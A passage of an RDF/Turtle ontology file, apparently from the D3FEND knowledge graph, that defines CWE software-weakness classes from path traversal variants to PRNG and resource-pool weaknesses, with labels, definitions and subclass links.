"CWE-26" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"/dir/../filename\" sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-261 a owl:Class ; rdfs:label "Weak Encoding for Password" ; d3f:cwe-id "CWE-261" ; d3f:definition "Obscuring a password with a trivial encoding does not protect the password." ; rdfs:subClassOf d3f:CWE-522 . d3f:CWE-262 a owl:Class ; rdfs:label "Not Using Password Aging" ; d3f:cwe-id "CWE-262" ; d3f:definition "The product does not have a mechanism in place for managing password aging." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-263 a owl:Class ; rdfs:label "Password Aging with Long Expiration" ; d3f:cwe-id "CWE-263" ; d3f:definition "The product supports password aging, but the expiration period is too long." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-268 a owl:Class ; rdfs:label "Privilege Chaining" ; d3f:cwe-id "CWE-268" ; d3f:definition "Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination." ; rdfs:subClassOf d3f:CWE-269 . d3f:CWE-27 a owl:Class ; rdfs:label "Path Traversal: 'dir/../../filename'" ; d3f:cwe-id "CWE-27" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize multiple internal \"../\" sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-270 a owl:Class ; rdfs:label "Privilege Context Switching Error" ; d3f:cwe-id "CWE-270" ; d3f:definition "The product does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control." ; rdfs:subClassOf d3f:CWE-269 . d3f:CWE-272 a owl:Class ; rdfs:label "Least Privilege Violation" ; d3f:cwe-id "CWE-272" ; d3f:definition "The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed." ; rdfs:subClassOf d3f:CWE-271 . d3f:CWE-273 a owl:Class ; rdfs:label "Improper Check for Dropped Privileges" ; d3f:cwe-id "CWE-273" ; d3f:definition "The product attempts to drop privileges but does not check or incorrectly checks to see if the drop succeeded." ; rdfs:subClassOf d3f:CWE-271, d3f:CWE-754 . d3f:CWE-274 a owl:Class ; rdfs:label "Improper Handling of Insufficient Privileges" ; d3f:cwe-id "CWE-274" ; d3f:definition "The product does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses." ; rdfs:subClassOf d3f:CWE-269, d3f:CWE-755 . d3f:CWE-276 a owl:Class, owl:NamedIndividual ; rdfs:label "Incorrect Default Permissions" ; d3f:cwe-id "CWE-276" ; d3f:definition "During installation, installed file permissions are set to allow anyone to modify those files." ; d3f:weakness-of d3f:ApplicationInstaller ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:ApplicationInstaller ], d3f:CWE-732 . d3f:CWE-277 a owl:Class ; rdfs:label "Insecure Inherited Permissions" ; d3f:cwe-id "CWE-277" ; d3f:definition "A product defines a set of insecure permissions that are inherited by objects that are created by the program." ; rdfs:subClassOf d3f:CWE-732 . d3f:CWE-278 a owl:Class ; rdfs:label "Insecure Preserved Inherited Permissions" ; d3f:cwe-id "CWE-278" ; d3f:definition "A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement." ; rdfs:subClassOf d3f:CWE-732 . d3f:CWE-279 a owl:Class ; rdfs:label "Incorrect Execution-Assigned Permissions" ; d3f:cwe-id "CWE-279" ; d3f:definition "While it is executing, the product sets the permissions of an object in a way that violates the intended permissions that have been specified by the user." ; rdfs:subClassOf d3f:CWE-732 . d3f:CWE-28 a owl:Class ; rdfs:label "Path Traversal: '..\\filedir'" ; d3f:cwe-id "CWE-28" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"..\\\" sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-280 a owl:Class ; rdfs:label "Improper Handling of Insufficient Permissions or Privileges" ; d3f:cwe-id "CWE-280" ; d3f:definition "The product does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the product in an invalid state." ; rdfs:subClassOf d3f:CWE-755 . d3f:CWE-281 a owl:Class ; rdfs:label "Improper Preservation of Permissions" ; d3f:cwe-id "CWE-281" ; d3f:definition "The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended." ; rdfs:subClassOf d3f:CWE-732 . d3f:CWE-283 a owl:Class ; rdfs:label "Unverified Ownership" ; d3f:cwe-id "CWE-283" ; d3f:definition "The product does not properly verify that a critical resource is owned by the proper entity." ; rdfs:subClassOf d3f:CWE-282 . d3f:CWE-289 a owl:Class ; rdfs:label "Authentication Bypass by Alternate Name" ; d3f:cwe-id "CWE-289" ; d3f:definition "The product performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-29 a owl:Class ; rdfs:label "Path Traversal: '\\..\\filename'" ; d3f:cwe-id "CWE-29" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\\..\\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-291 a owl:Class ; rdfs:label "Reliance on IP Address for Authentication" ; d3f:cwe-id "CWE-291" ; d3f:definition "The product uses an IP address for authentication." ; rdfs:subClassOf d3f:CWE-290, d3f:CWE-471, d3f:CWE-923 . d3f:CWE-293 a owl:Class ; rdfs:label "Using Referer Field for Authentication" ; d3f:cwe-id "CWE-293" ; d3f:definition "The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking." ; d3f:synonym "referrer" ; rdfs:subClassOf d3f:CWE-290 . d3f:CWE-294 a owl:Class ; rdfs:label "Authentication Bypass by Capture-replay" ; d3f:cwe-id "CWE-294" ; d3f:definition "A capture-replay flaw exists when the design of the product makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes)." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-296 a owl:Class ; rdfs:label "Improper Following of a Certificate's Chain of Trust" ; d3f:cwe-id "CWE-296" ; d3f:definition "The product does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate." ; rdfs:subClassOf d3f:CWE-295, d3f:CWE-573 . d3f:CWE-297 a owl:Class ; rdfs:label "Improper Validation of Certificate with Host Mismatch" ; d3f:cwe-id "CWE-297" ; d3f:definition "The product communicates with a host that provides a certificate, but the product does not properly ensure that the certificate is actually associated with that host." ; rdfs:subClassOf d3f:CWE-295, d3f:CWE-923 . d3f:CWE-298 a owl:Class ; rdfs:label "Improper Validation of Certificate Expiration" ; d3f:cwe-id "CWE-298" ; d3f:definition "A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age." ; rdfs:subClassOf d3f:CWE-295, d3f:CWE-672 . d3f:CWE-30 a owl:Class ; rdfs:label "Path Traversal: '\\dir\\..\\filename'" ; d3f:cwe-id "CWE-30" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\\dir\\..\\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-300 a owl:Class ; rdfs:label "Channel Accessible by Non-Endpoint" ; d3f:cwe-id "CWE-300" ; d3f:definition "The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint." ; d3f:synonym "Adversary-in-the-Middle / AITM", "Interception attack", "Man-in-the-Middle / MITM", "Manipulator-in-the-Middle", "Monkey-in-the-Middle", "Monster-in-the-Middle", "On-path attack", "Person-in-the-Middle / PITM" ; rdfs:subClassOf d3f:CWE-923 . d3f:CWE-301 a owl:Class ; rdfs:label "Reflection Attack in an Authentication Protocol" ; d3f:cwe-id "CWE-301" ; d3f:definition "Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-302 a owl:Class ; rdfs:label "Authentication Bypass by Assumed-Immutable Data" ; d3f:cwe-id "CWE-302" ; d3f:definition "The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker." ; rdfs:subClassOf d3f:CWE-1390, d3f:CWE-807 . d3f:CWE-304 a owl:Class ; rdfs:label "Missing Critical Step in Authentication" ; d3f:cwe-id "CWE-304" ; d3f:definition "The product implements an authentication technique, but it skips a step that weakens the technique." ; rdfs:subClassOf d3f:CWE-303, d3f:CWE-573 . d3f:CWE-305 a owl:Class ; rdfs:label "Authentication Bypass by Primary Weakness" ; d3f:cwe-id "CWE-305" ; d3f:definition "The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-307 a owl:Class ; rdfs:label "Improper Restriction of Excessive Authentication Attempts" ; d3f:cwe-id "CWE-307" ; d3f:definition "The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame." ; rdfs:subClassOf d3f:CWE-1390, d3f:CWE-799 . d3f:CWE-308 a owl:Class ; rdfs:label "Use of Single-factor Authentication" ; d3f:cwe-id "CWE-308" ; d3f:definition "The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme." ; rdfs:subClassOf d3f:CWE-1390, d3f:CWE-654 . d3f:CWE-309 a owl:Class ; rdfs:label "Use of Password System for Primary Authentication" ; d3f:cwe-id "CWE-309" ; d3f:definition "The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism." ; rdfs:subClassOf d3f:CWE-1390, d3f:CWE-654 . d3f:CWE-31 a owl:Class ; rdfs:label "Path Traversal: 'dir\\..\\..\\filename'" ; d3f:cwe-id "CWE-31" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize 'dir\\..\\..\\filename' (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-313 a owl:Class ; rdfs:label "Cleartext Storage in a File or on Disk" ; d3f:cwe-id "CWE-313" ; d3f:definition "The product stores sensitive information in cleartext in a file, or on disk." ; rdfs:subClassOf d3f:CWE-312 . d3f:CWE-314 a owl:Class ; rdfs:label "Cleartext Storage in the Registry" ; d3f:cwe-id "CWE-314" ; d3f:definition "The product stores sensitive information in cleartext in the registry." ; rdfs:subClassOf d3f:CWE-312 . d3f:CWE-315 a owl:Class ; rdfs:label "Cleartext Storage of Sensitive Information in a Cookie" ; d3f:cwe-id "CWE-315" ; d3f:definition "The product stores sensitive information in cleartext in a cookie." ; rdfs:subClassOf d3f:CWE-312 . d3f:CWE-316 a owl:Class ; rdfs:label "Cleartext Storage of Sensitive Information in Memory" ; d3f:cwe-id "CWE-316" ; d3f:definition "The product stores sensitive information in cleartext in memory." ; rdfs:subClassOf d3f:CWE-312 . d3f:CWE-317 a owl:Class ; rdfs:label "Cleartext Storage of Sensitive Information in GUI" ; d3f:cwe-id "CWE-317" ; d3f:definition "The product stores sensitive information in cleartext within the GUI." ; rdfs:subClassOf d3f:CWE-312 . d3f:CWE-318 a owl:Class ; rdfs:label "Cleartext Storage of Sensitive Information in Executable" ; d3f:cwe-id "CWE-318" ; d3f:definition "The product stores sensitive information in cleartext in an executable." ; rdfs:subClassOf d3f:CWE-312 . d3f:CWE-32 a owl:Class ; rdfs:label "Path Traversal: '...' (Triple Dot)" ; d3f:cwe-id "CWE-32" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '...' (triple dot) sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-321 a owl:Class ; rdfs:label "Use of Hard-coded Cryptographic Key" ; d3f:cwe-id "CWE-321" ; d3f:definition "The product uses a hard-coded, unchangeable cryptographic key." ; rdfs:subClassOf d3f:CWE-798 . d3f:CWE-322 a owl:Class ; rdfs:label "Key Exchange without Entity Authentication" ; d3f:cwe-id "CWE-322" ; d3f:definition "The product performs a key exchange with an actor without verifying the identity of that actor." ; rdfs:subClassOf d3f:CWE-306 . d3f:CWE-323 a owl:Class ; rdfs:label "Reusing a Nonce, Key Pair in Encryption" ; d3f:cwe-id "CWE-323" ; d3f:definition "Nonces should be used for the present occasion and only once." ; rdfs:subClassOf d3f:CWE-344 . d3f:CWE-324 a owl:Class ; rdfs:label "Use of a Key Past its Expiration Date" ; d3f:cwe-id "CWE-324" ; d3f:definition "The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key." ; rdfs:subClassOf d3f:CWE-672 . d3f:CWE-325 a owl:Class ; rdfs:label "Missing Cryptographic Step" ; d3f:cwe-id "CWE-325" ; d3f:definition "The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm." ; rdfs:subClassOf d3f:CWE-573 . d3f:CWE-329 a owl:Class ; rdfs:label "Generation of Predictable IV with CBC Mode" ; d3f:cwe-id "CWE-329" ; d3f:definition "The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key." ; rdfs:subClassOf d3f:CWE-1204, d3f:CWE-573 . d3f:CWE-33 a owl:Class ; rdfs:label "Path Traversal: '....' (Multiple Dot)" ; d3f:cwe-id "CWE-33" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....' (multiple dot) sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-332 a owl:Class ; rdfs:label "Insufficient Entropy in PRNG" ; d3f:cwe-id "CWE-332" ; d3f:definition "The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat." ; rdfs:subClassOf d3f:CWE-331 . d3f:CWE-333 a owl:Class ; rdfs:label "Improper Handling of Insufficient Entropy in TRNG" ; d3f:cwe-id "CWE-333" ; d3f:definition "True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block." ; rdfs:subClassOf d3f:CWE-331, d3f:CWE-703, d3f:CWE-755 . d3f:CWE-336 a owl:Class ; rdfs:label "Same Seed in Pseudo-Random Number Generator (PRNG)" ; d3f:cwe-id "CWE-336" ; d3f:definition "A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized." ; rdfs:subClassOf d3f:CWE-335 . d3f:CWE-337 a owl:Class ; rdfs:label "Predictable Seed in Pseudo-Random Number Generator (PRNG)" ; d3f:cwe-id "CWE-337" ; d3f:definition "A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time." ; rdfs:subClassOf d3f:CWE-335 . d3f:CWE-338 a owl:Class ; rdfs:label "Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)" ; d3f:cwe-id "CWE-338" ; d3f:definition "The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong." ; rdfs:subClassOf d3f:CWE-330 . d3f:CWE-339 a owl:Class ; rdfs:label "Small Seed Space in PRNG" ; d3f:cwe-id "CWE-339" ; d3f:definition "A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks." ; rdfs:subClassOf d3f:CWE-335 . d3f:CWE-34 a owl:Class ; rdfs:label "Path Traversal: '....//'" ; d3f:cwe-id "CWE-34" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....//' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-341 a owl:Class ; rdfs:label "Predictable from Observable State" ; d3f:cwe-id "CWE-341" ; d3f:definition "A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc." ; rdfs:subClassOf d3f:CWE-340 . d3f:CWE-342 a owl:Class ; rdfs:label "Predictable Exact Value from Previous Values" ; d3f:cwe-id "CWE-342" ; d3f:definition "An exact value or random number can be precisely predicted by observing previous values." ; rdfs:subClassOf d3f:CWE-340 . d3f:CWE-343 a owl:Class ; rdfs:label "Predictable Value Range from Previous Values" ; d3f:cwe-id "CWE-343" ; d3f:definition "The product's random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated." ; rdfs:subClassOf d3f:CWE-340 . d3f:CWE-347 a owl:Class ; rdfs:label "Improper Verification of Cryptographic Signature" ; d3f:cwe-id "CWE-347" ; d3f:definition "The product does not verify, or incorrectly verifies, the cryptographic signature for data." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-348 a owl:Class ; rdfs:label "Use of Less Trusted Source" ; d3f:cwe-id "CWE-348" ; d3f:definition "The product has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-349 a owl:Class ; rdfs:label "Acceptance of Extraneous Untrusted Data With Trusted Data" ; d3f:cwe-id "CWE-349" ; d3f:definition "The product, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-35 a owl:Class ; rdfs:label "Path Traversal: '.../...//'" ; d3f:cwe-id "CWE-35" ; d3f:definition "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory." ; rdfs:subClassOf d3f:CWE-23 . d3f:CWE-350 a owl:Class ; rdfs:label "Reliance on Reverse DNS Resolution for a Security-Critical Action" ; d3f:cwe-id "CWE-350" ; d3f:definition "The product performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname." ; rdfs:subClassOf d3f:CWE-290, d3f:CWE-807 . d3f:CWE-351 a owl:Class ; rdfs:label "Insufficient Type Distinction" ; d3f:cwe-id "CWE-351" ; d3f:definition "The product does not properly distinguish between different types of elements in a way that leads to insecure behavior." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-352 a owl:Class, owl:NamedIndividual ; rdfs:label "Cross-Site Request Forgery (CSRF)" ; d3f:cwe-id "CWE-352" ; d3f:definition "The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor." ; d3f:synonym "CSRF", "Cross Site Reference Forgery", "Session Riding", "XSRF" ; d3f:weakness-of d3f:UserInputFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:UserInputFunction ], d3f:CWE-345 . d3f:CWE-353 a owl:Class ; rdfs:label "Missing Support for Integrity Check" ; d3f:cwe-id "CWE-353" ; d3f:definition "The product uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-354 a owl:Class ; rdfs:label "Improper Validation of Integrity Check Value" ; d3f:cwe-id "CWE-354" ; d3f:definition "The product does not validate or incorrectly validates the integrity check values or \"checksums\" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission." ; rdfs:subClassOf d3f:CWE-345, d3f:CWE-754 . d3f:CWE-356 a owl:Class ; rdfs:label "Product UI does not Warn User of Unsafe Actions" ; d3f:cwe-id "CWE-356" ; d3f:definition "The product's user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system." ; rdfs:subClassOf d3f:CWE-221 . d3f:CWE-358 a owl:Class ; rdfs:label "Improperly Implemented Security Check for Standard" ; d3f:cwe-id "CWE-358" ; d3f:definition "The product does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique." ; rdfs:subClassOf d3f:CWE-573, d3f:CWE-693 . d3f:CWE-359 a owl:Class ; rdfs:label "Exposure of Private Personal Information to an Unauthorized Actor" ; d3f:cwe-id "CWE-359" ; d3f:definition "The product does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected." ; d3f:synonym "Privacy leak", "Privacy leakage", "Privacy violation" ; rdfs:subClassOf d3f:CWE-200 . d3f:CWE-363 a owl:Class ; rdfs:label "Race Condition Enabling Link Following" ; d3f:cwe-id "CWE-363" ; d3f:definition "The product checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the product to access the wrong file." ; rdfs:subClassOf d3f:CWE-367 . d3f:CWE-366 a owl:Class ; rdfs:label "Race Condition within a Thread" ; d3f:cwe-id "CWE-366" ; d3f:definition "If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined." ; rdfs:subClassOf d3f:CWE-362 . d3f:CWE-368 a owl:Class ; rdfs:label "Context Switching Race Condition" ; d3f:cwe-id "CWE-368" ; d3f:definition "A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product's behavior during the switch." ; rdfs:subClassOf d3f:CWE-362 . d3f:CWE-369 a owl:Class ; rdfs:label "Divide By Zero" ; d3f:cwe-id "CWE-369" ; d3f:definition "The product divides a value by zero." ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-37 a owl:Class ; rdfs:label "Path Traversal: '/absolute/pathname/here'" ; d3f:cwe-id "CWE-37" ; d3f:definition "The product accepts input in the form of a slash absolute path ('/absolute/pathname/here') without appropriate validation, which can allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-160, d3f:CWE-36 . d3f:CWE-370 a owl:Class ; rdfs:label "Missing Check for Certificate Revocation after Initial Check" ; d3f:cwe-id "CWE-370" ; d3f:definition "The product does not check the revocation status of a certificate after its initial revocation check, which can cause the product to perform privileged actions even after the certificate is revoked at a later time." ; rdfs:subClassOf d3f:CWE-299 . d3f:CWE-372 a owl:Class ; rdfs:label "Incomplete Internal State Distinction" ; d3f:cwe-id "CWE-372" ; d3f:definition "The product does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner." ; rdfs:subClassOf d3f:CWE-664 . d3f:CWE-374 a owl:Class ; rdfs:label "Passing Mutable Objects to an Untrusted Method" ; d3f:cwe-id "CWE-374" ; d3f:definition "The product sends non-cloned mutable data as an argument to a method or function." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-375 a owl:Class ; rdfs:label "Returning a Mutable Object to an Untrusted Caller" ; d3f:cwe-id "CWE-375" ; d3f:definition "Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-378 a owl:Class ; rdfs:label "Creation of Temporary File With Insecure Permissions" ; d3f:cwe-id "CWE-378" ; d3f:definition "Opening temporary files without appropriate measures or controls can leave the file, its contents and any function that it impacts vulnerable to attack." ; rdfs:subClassOf d3f:CWE-377 . d3f:CWE-379 a owl:Class ; rdfs:label "Creation of Temporary File in Directory with Insecure Permissions" ; d3f:cwe-id "CWE-379" ; d3f:definition "The product creates a temporary file in a directory whose permissions allow unintended actors to determine the file's existence or otherwise access that file." ; rdfs:subClassOf d3f:CWE-377 . d3f:CWE-38 a owl:Class ; rdfs:label "Path Traversal: '\\absolute\\pathname\\here'" ; d3f:cwe-id "CWE-38" ; d3f:definition "The product accepts input in the form of a backslash absolute path ('\\absolute\\pathname\\here') without appropriate validation, which can allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-36 . d3f:CWE-382 a owl:Class ; rdfs:label "J2EE Bad Practices: Use of System.exit()" ; d3f:cwe-id "CWE-382" ; d3f:definition "A J2EE application uses System.exit(), which also shuts down its container." ; rdfs:subClassOf d3f:CWE-705 . d3f:CWE-383 a owl:Class ; rdfs:label "J2EE Bad Practices: Direct Use of Threads" ; d3f:cwe-id "CWE-383" ; d3f:definition "Thread management in a Web application is forbidden in some circumstances and is always highly error prone." ; rdfs:subClassOf d3f:CWE-695 . d3f:CWE-384 a owl:Class ; rdfs:label "Session Fixation" ; d3f:cwe-id "CWE-384" ; d3f:definition "Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions." ; rdfs:subClassOf d3f:CWE-610 . d3f:CWE-385 a owl:Class ; rdfs:label "Covert Timing Channel" ; d3f:cwe-id "CWE-385" ; d3f:definition "Covert timing channels convey information by modulating some aspect of system behavior over time, so that the program receiving the information can observe system behavior and infer protected information." ; rdfs:subClassOf d3f:CWE-514 . d3f:CWE-386 a owl:Class ; rdfs:label "Symbolic Name not Mapping to Correct Object" ; d3f:cwe-id "CWE-386" ; d3f:definition "A constant symbolic reference to an object is used, even though the reference can resolve to a different object over time." ; rdfs:subClassOf d3f:CWE-706 . d3f:CWE-39 a owl:Class ; rdfs:label "Path Traversal: 'C:dirname'" ; d3f:cwe-id "CWE-39" ; d3f:definition "The product accepts input that contains a drive letter or Windows volume letter ('C:dirname') that potentially redirects access to an unintended location or arbitrary file." ; rdfs:subClassOf d3f:CWE-36 . d3f:CWE-390 a owl:Class ; rdfs:label "Detection of Error Condition Without Action" ; d3f:cwe-id "CWE-390" ; d3f:definition "The product detects a specific error, but takes no actions to handle the error." ; rdfs:subClassOf d3f:CWE-755 . d3f:CWE-391 a owl:Class ; rdfs:label "Unchecked Error Condition" ; d3f:cwe-id "CWE-391" ; d3f:definition "[PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed." ; rdfs:subClassOf d3f:CWE-754 . d3f:CWE-392 a owl:Class ; rdfs:label "Missing Report of Error Condition" ; d3f:cwe-id "CWE-392" ; d3f:definition "The product encounters an error but does not provide a status code or return value to indicate that an error has occurred." ; rdfs:subClassOf d3f:CWE-684, d3f:CWE-703, d3f:CWE-755 . d3f:CWE-393 a owl:Class ; rdfs:label "Return of Wrong Status Code" ; d3f:cwe-id "CWE-393" ; d3f:definition "A function or operation returns an incorrect return value or status code that does not indicate the true result of execution, causing the product to modify its behavior based on the incorrect result." ; rdfs:subClassOf d3f:CWE-684, d3f:CWE-703 . d3f:CWE-394 a owl:Class ; rdfs:label "Unexpected Status Code or Return Value" ; d3f:cwe-id "CWE-394" ; d3f:definition "The product does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the product." ; rdfs:subClassOf d3f:CWE-754 . d3f:CWE-395 a owl:Class ; rdfs:label "Use of NullPointerException Catch to Detect NULL Pointer Dereference" ; d3f:cwe-id "CWE-395" ; d3f:definition "Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer." ; rdfs:subClassOf d3f:CWE-705, d3f:CWE-755 . d3f:CWE-396 a owl:Class ; rdfs:label "Declaration of Catch for Generic Exception" ; d3f:cwe-id "CWE-396" ; d3f:definition "Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities." ; rdfs:subClassOf d3f:CWE-221, d3f:CWE-705, d3f:CWE-755 . d3f:CWE-397 a owl:Class ; rdfs:label "Declaration of Throws for Generic Exception" ; d3f:cwe-id "CWE-397" ; d3f:definition "The product throws or raises an overly broad exceptions that can hide important details and produce inappropriate responses to certain conditions." ; rdfs:subClassOf d3f:CWE-221, d3f:CWE-703, d3f:CWE-705 . d3f:CWE-40 a owl:Class ; rdfs:label "Path Traversal: '\\\\UNC\\share\\name\\' (Windows UNC Share)" ; d3f:cwe-id "CWE-40" ; d3f:definition "The product accepts input that identifies a Windows UNC share ('\\\\UNC\\share\\name') that potentially redirects access to an unintended location or arbitrary file." ; rdfs:subClassOf d3f:CWE-36 . d3f:CWE-401 a owl:Class ; rdfs:label "Missing Release of Memory after Effective Lifetime" ; d3f:cwe-id "CWE-401" ; d3f:definition "The product does not sufficiently track and release allocated memory after it has been used, making the memory unavailable for reallocation and reuse." ; d3f:synonym "Memory Leak" ; rdfs:subClassOf d3f:CWE-772 . d3f:CWE-403 a owl:Class ; rdfs:label "Exposure of File Descriptor to Unintended Control Sphere ('File Descriptor Leak')" ; d3f:cwe-id "CWE-403" ; d3f:definition "A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors." ; d3f:synonym "File descriptor leak" ; rdfs:subClassOf d3f:CWE-402 . d3f:CWE-406 a owl:Class ; rdfs:label "Insufficient Control of Network Message Volume (Network Amplification)" ; d3f:cwe-id "CWE-406" ; d3f:definition "The product does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the product to transmit more traffic than should be allowed for that actor." ; rdfs:subClassOf d3f:CWE-405 . d3f:CWE-408 a owl:Class ; rdfs:label "Incorrect Behavior Order: Early Amplification" ; d3f:cwe-id "CWE-408" ; d3f:definition "The product allows an entity to perform a legitimate but expensive operation before authentication or authorization has taken place." ; rdfs:subClassOf d3f:CWE-405, d3f:CWE-696 . d3f:CWE-409 a owl:Class ; rdfs:label "Improper Handling of Highly Compressed Data (Data Amplification)" ; d3f:cwe-id "CWE-409" ; d3f:definition "The product does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output." ; rdfs:subClassOf d3f:CWE-405 . d3f:CWE-410 a owl:Class ; rdfs:label "Insufficient Resource Pool" ; d3f:cwe-id "CWE-410" ; d3f:definition "The product's resource pool is not large enough to handle peak demand, which allows an attacker to prevent others from accessing the resource by using a (relatively) large number of requests for resources." ; rdfs:subClassOf d3f:CWE-664 . d3f:CWE-412 a 